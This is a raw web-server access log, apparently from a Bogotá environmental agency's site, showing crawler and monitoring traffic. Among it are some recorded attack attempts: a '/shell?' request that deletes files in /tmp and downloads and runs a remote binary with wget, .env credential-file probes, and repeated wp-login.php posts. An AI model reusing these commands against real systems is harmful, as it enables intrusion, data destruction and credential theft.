201.245.192.253 - - [06/Jan/2023:01:52:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:01:54:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Jan/2023:01:56:16 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Jan/2023:01:56:23 -0500] "-" 408 -
172.22.2.4 - - [06/Jan/2023:01:55:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
172.22.2.4 - - [06/Jan/2023:01:57:52 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [06/Jan/2023:01:57:53 -0500] "GET /BLA/boletinlegal/ab2h HTTP/1.1" 404 1018
201.245.192.253 - - [06/Jan/2023:01:57:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:01:58:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [06/Jan/2023:02:01:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:02:00:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:02:00:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [06/Jan/2023:02:02:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
207.46.13.192 - - [06/Jan/2023:02:05:28 -0500] "GET /Publicaciones/2022EE129128.pdf HTTP/1.1" 404 228
216.245.221.92 - - [06/Jan/2023:02:06:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:02:05:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:02:07:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:02:06:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
152.61.128.50 - - [06/Jan/2023:02:08:47 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [06/Jan/2023:02:08:49 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [06/Jan/2023:02:08:49 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
114.119.157.96 - - [06/Jan/2023:02:09:47 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2021/&sort=date&order=desc HTTP/1.1" 200 13687
216.245.221.92 - - [06/Jan/2023:02:11:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:02:12:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:02:11:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:02:12:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
172.22.2.4 - - [06/Jan/2023:02:15:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
216.245.221.92 - - [06/Jan/2023:02:16:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:02:17:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
185.119.81.105 - - [06/Jan/2023:02:18:35 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Jan/2023:02:18:36 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [06/Jan/2023:02:17:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:02:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42680
201.245.192.253 - - [06/Jan/2023:02:19:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43935
172.22.2.4 - - [06/Jan/2023:02:18:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58612
40.77.167.21 - - [06/Jan/2023:02:20:44 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 109802
114.119.134.192 - - [06/Jan/2023:02:20:54 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2001/ HTTP/1.1" 200 13709
157.55.39.100 - - [06/Jan/2023:02:21:02 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/plugins/type/simple/simple/dist/smartslider-simple-type-frontend.min.js?1563274780 HTTP/1.1" 200 18726
207.46.13.121 - - [06/Jan/2023:02:21:02 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/smartslider.min.css?1558968666 HTTP/1.1" 200 19594
207.46.13.170 - - [06/Jan/2023:02:21:03 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/nextend/media/dist/nextend-frontend.min.js?1563274780 HTTP/1.1" 200 76980
40.77.167.21 - - [06/Jan/2023:02:21:04 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/nextend/media/dist/n2.min.js?1528383544 HTTP/1.1" 200 3495
157.55.39.150 - - [06/Jan/2023:02:21:06 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/dist/smartslider-frontend.min.js?1563274780 HTTP/1.1" 200 128256
216.245.221.92 - - [06/Jan/2023:02:21:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:02:22:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
185.119.81.100 - - [06/Jan/2023:02:23:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Jan/2023:02:23:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [06/Jan/2023:02:23:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:02:24:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
216.245.221.92 - - [06/Jan/2023:02:26:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:02:27:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
205.185.118.237 - - [06/Jan/2023:02:28:07 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
201.245.192.253 - - [06/Jan/2023:02:29:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42680
201.245.192.253 - - [06/Jan/2023:02:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43935
172.22.2.4 - - [06/Jan/2023:02:29:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Jan/2023:02:31:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:02:30:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
201.245.192.253 - - [06/Jan/2023:02:32:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
114.119.131.200 - - [06/Jan/2023:02:33:37 -0500] "GET /autoliquidacion/index.php?dir=TR%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%AF%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%BDMITES%2BACEITES-RESIDUOS-ESTACIONES/REGISTRO%2BACEITE%2BVEGETAL%2BUSADO/&sort=name&order=asc HTTP/1.1" 200 9323
216.245.221.92 - - [06/Jan/2023:02:36:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:02:35:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:02:35:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [06/Jan/2023:02:37:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
201.245.192.253 - - [06/Jan/2023:02:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42680
201.245.192.253 - - [06/Jan/2023:02:39:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43935
216.245.221.92 - - [06/Jan/2023:02:41:16 -0500] "HEAD / HTTP/1.1" 200 -
20.62.145.15 - - [06/Jan/2023:02:42:14 -0500] "-" 408 -
114.119.150.248 - - [06/Jan/2023:02:42:18 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2003/ HTTP/1.1" 200 13709
172.22.2.4 - - [06/Jan/2023:02:40:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:02:42:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:02:41:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
40.77.167.12 - - [06/Jan/2023:02:44:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%201550-1607.tif HTTP/1.1" 200 3610490
216.245.221.92 - - [06/Jan/2023:02:46:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:02:47:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:02:46:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:02:47:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
185.180.143.136 - - [06/Jan/2023:02:49:37 -0500] "GET / HTTP/1.1" 200 319
185.180.143.136 - - [06/Jan/2023:02:49:37 -0500] "GET /api/jsonws/ HTTP/1.1" 404 1018
216.245.221.92 - - [06/Jan/2023:02:51:16 -0500] "HEAD / HTTP/1.1" 200 -
114.119.146.212 - - [06/Jan/2023:02:51:23 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/REGISTROS%2B2019/&sort=name&order=desc HTTP/1.1" 200 13761
201.245.192.253 - - [06/Jan/2023:02:52:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:02:52:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.192 - - [06/Jan/2023:02:54:42 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Jan/2023:02:53:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
216.245.221.92 - - [06/Jan/2023:02:56:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:02:57:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
41.233.234.205 - - [06/Jan/2023:02:58:53 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 172.105.127.208/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [06/Jan/2023:02:58:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.146.38 - - [06/Jan/2023:03:00:11 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2021/&sort=date&order=desc HTTP/1.1" 200 13749
172.22.2.4 - - [06/Jan/2023:02:59:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
216.245.221.92 - - [06/Jan/2023:03:01:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:03:02:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
66.249.73.97 - - [06/Jan/2023:03:04:11 -0500] "-" 408 -
172.22.2.4 - - [06/Jan/2023:03:04:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:03:06:08 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
216.245.221.92 - - [06/Jan/2023:03:06:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:03:05:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
201.245.192.253 - - [06/Jan/2023:03:07:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
114.119.130.218 - - [06/Jan/2023:03:08:34 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2006/&sort=size&order=asc HTTP/1.1" 200 13709
216.245.221.92 - - [06/Jan/2023:03:11:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:03:10:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
18.218.93.184 - - [06/Jan/2023:03:12:33 -0500] "POST / HTTP/1.1" 200 319
172.22.2.4 - - [06/Jan/2023:03:10:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
18.218.93.184 - - [06/Jan/2023:03:12:41 -0500] "GET /.env HTTP/1.1" 404 1018
201.245.192.253 - - [06/Jan/2023:03:12:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
18.218.93.184 - - [06/Jan/2023:03:12:45 -0500] "GET /190.27.245.106/.env HTTP/1.1" 404 1018
18.218.93.184 - - [06/Jan/2023:03:12:49 -0500] "GET /vendor/.env HTTP/1.1" 404 1018
18.218.93.184 - - [06/Jan/2023:03:12:51 -0500] "GET /190.27.245.106/.env HTTP/1.1" 404 1018
18.218.93.184 - - [06/Jan/2023:03:12:54 -0500] "GET /admin/.env HTTP/1.1" 404 1018
18.218.93.184 - - [06/Jan/2023:03:12:57 -0500] "GET /190.27.245.106/.env HTTP/1.1" 404 1018
157.55.39.150 - - [06/Jan/2023:03:16:08 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-miambiente-ni%C3%B1os.png HTTP/1.1" 200 11944
216.245.221.92 - - [06/Jan/2023:03:16:16 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.2 - - [06/Jan/2023:03:17:10 -0500] "GET /images/mantener-calidad-del-aire_optimized.jpeg HTTP/1.1" 200 67646
114.119.153.191 - - [06/Jan/2023:03:17:10 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2005/ HTTP/1.1" 200 13688
172.22.2.4 - - [06/Jan/2023:03:15:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:03:17:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:03:16:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
201.245.192.253 - - [06/Jan/2023:03:19:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42375
201.245.192.253 - - [06/Jan/2023:03:19:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43769
31.13.127.26 - - [06/Jan/2023:03:19:21 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [06/Jan/2023:03:21:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:03:22:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:03:21:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.154.118 - - [06/Jan/2023:03:23:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2090.pdf HTTP/1.1" 200 2562286
172.22.2.4 - - [06/Jan/2023:03:22:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
216.245.221.92 - - [06/Jan/2023:03:26:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:03:27:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:03:27:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:03:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42375
201.245.192.253 - - [06/Jan/2023:03:29:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43769
114.119.137.180 - - [06/Jan/2023:03:29:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0786.pdf HTTP/1.1" 200 314721
172.22.2.4 - - [06/Jan/2023:03:28:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
216.245.221.92 - - [06/Jan/2023:03:31:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:03:32:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
185.119.81.102 - - [06/Jan/2023:03:32:57 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Jan/2023:03:32:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Jan/2023:03:33:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:03:34:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50149
114.119.151.14 - - [06/Jan/2023:03:35:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0938.pdf HTTP/1.1" 200 2638915
216.245.221.92 - - [06/Jan/2023:03:36:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:03:36:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [06/Jan/2023:03:37:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:03:37:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [06/Jan/2023:03:39:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42375
201.245.192.253 - - [06/Jan/2023:03:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43769
114.119.154.203 - - [06/Jan/2023:03:40:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/2416.pdf HTTP/1.1" 200 647618
172.22.2.4 - - [06/Jan/2023:03:39:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Jan/2023:03:41:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:03:40:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
201.245.192.253 - - [06/Jan/2023:03:42:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
114.119.134.123 - - [06/Jan/2023:03:44:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7866.pdf HTTP/1.1" 200 530232
40.77.167.12 - - [06/Jan/2023:03:44:39 -0500] "GET /Publicaciones/2022EE129731.pdf HTTP/1.1" 404 228
64.62.243.165 - - [06/Jan/2023:03:46:12 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [06/Jan/2023:03:46:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:03:45:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:03:47:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:03:45:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
114.119.139.212 - - [06/Jan/2023:03:48:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7669.pdf HTTP/1.1" 200 75519
207.46.13.3 - - [06/Jan/2023:03:48:39 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12500
168.119.253.85 - - [06/Jan/2023:03:49:57 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [06/Jan/2023:03:51:16 -0500] "HEAD / HTTP/1.1" 200 -
114.119.131.92 - - [06/Jan/2023:03:51:23 -0500] "GET /transparencia/financiera/Desagregado%20con%20modificaciones/Historico/Modificaciones%20pptales%202017.xlsx HTTP/1.1" 200 16806
172.22.2.4 - - [06/Jan/2023:03:51:49 -0500] "GET /BLA/boletinlegal/jurisprudencia' HTTP/1.1" 404 1038
201.245.192.253 - - [06/Jan/2023:03:52:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:03:50:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:03:52:53 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
172.22.2.4 - - [06/Jan/2023:03:51:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58612
163.198.120.88 - - [06/Jan/2023:03:53:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3652.pdf HTTP/1.1" 200 550940
114.119.128.154 - - [06/Jan/2023:03:55:16 -0500] "GET /autoliquidacion/index.php?dir=TR%C3%83%C2%83%C3%82%C2%AF%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%82%C3%82%C2%BDMITES%2BAGUAS%2BSUBTERR%C3%83%C2%83%C3%82%C2%AF%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%82%C3%82%C2%BDNEAS/&sort=name&order=asc HTTP/1.1" 200 7003
185.119.81.100 - - [06/Jan/2023:03:55:36 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Jan/2023:03:55:37 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [06/Jan/2023:03:56:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:03:57:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
114.119.149.92 - - [06/Jan/2023:03:58:23 -0500] "GET /autoliquidacion/index.php?dir=TR%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%AF%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%BDMITES%2BVERTIMIENTOS/&sort=size&order=asc HTTP/1.1" 200 7420
172.22.2.4 - - [06/Jan/2023:03:56:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:03:57:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56474
216.245.221.92 - - [06/Jan/2023:04:01:16 -0500] "HEAD / HTTP/1.1" 200 -
114.119.147.129 - - [06/Jan/2023:04:01:24 -0500] "GET /Residuos/lavanderias/files/guia_lavanderias.pdf HTTP/1.1" 200 15421112
201.245.192.253 - - [06/Jan/2023:04:02:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
114.119.150.42 - - [06/Jan/2023:04:04:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2018/&sort=size&order=desc HTTP/1.1" 200 13708
172.22.2.4 - - [06/Jan/2023:04:02:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:04:03:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
216.245.221.92 - - [06/Jan/2023:04:06:16 -0500] "HEAD / HTTP/1.1" 200 -
173.252.87.22 - - [06/Jan/2023:04:06:32 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
114.119.142.183 - - [06/Jan/2023:04:06:48 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2015/&sort=name&order=asc HTTP/1.1" 200 13750
201.245.192.253 - - [06/Jan/2023:04:07:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
114.119.159.233 - - [06/Jan/2023:04:08:28 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2018/&sort=size&order=desc HTTP/1.1" 200 13687
172.22.2.4 - - [06/Jan/2023:04:08:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.144.30 - - [06/Jan/2023:04:10:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1767.pdf HTTP/1.1" 200 871647
172.22.2.4 - - [06/Jan/2023:04:09:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
216.245.221.92 - - [06/Jan/2023:04:11:16 -0500] "HEAD / HTTP/1.1" 200 -
114.119.129.36 - - [06/Jan/2023:04:12:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0756.pdf HTTP/1.1" 200 452910
201.245.192.253 - - [06/Jan/2023:04:12:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:04:11:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
114.119.158.144 - - [06/Jan/2023:04:13:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2153.pdf HTTP/1.1" 200 1691904
114.119.130.218 - - [06/Jan/2023:04:14:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0126.pdf HTTP/1.1" 200 205802
162.55.175.141 - - [06/Jan/2023:04:15:08 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Jan/2023:04:14:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Jan/2023:04:16:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:04:15:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
114.119.146.55 - - [06/Jan/2023:04:16:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7647.pdf HTTP/1.1" 200 122758
201.245.192.253 - - [06/Jan/2023:04:17:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
157.55.39.100 - - [06/Jan/2023:04:18:33 -0500] "GET / HTTP/1.1" 200 4720
114.119.145.115 - - [06/Jan/2023:04:18:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7502.pdf HTTP/1.1" 200 36895
157.55.39.172 - - [06/Jan/2023:04:18:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201-50/00000032.tif HTTP/1.1" 200 292178
201.245.192.253 - - [06/Jan/2023:04:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42222
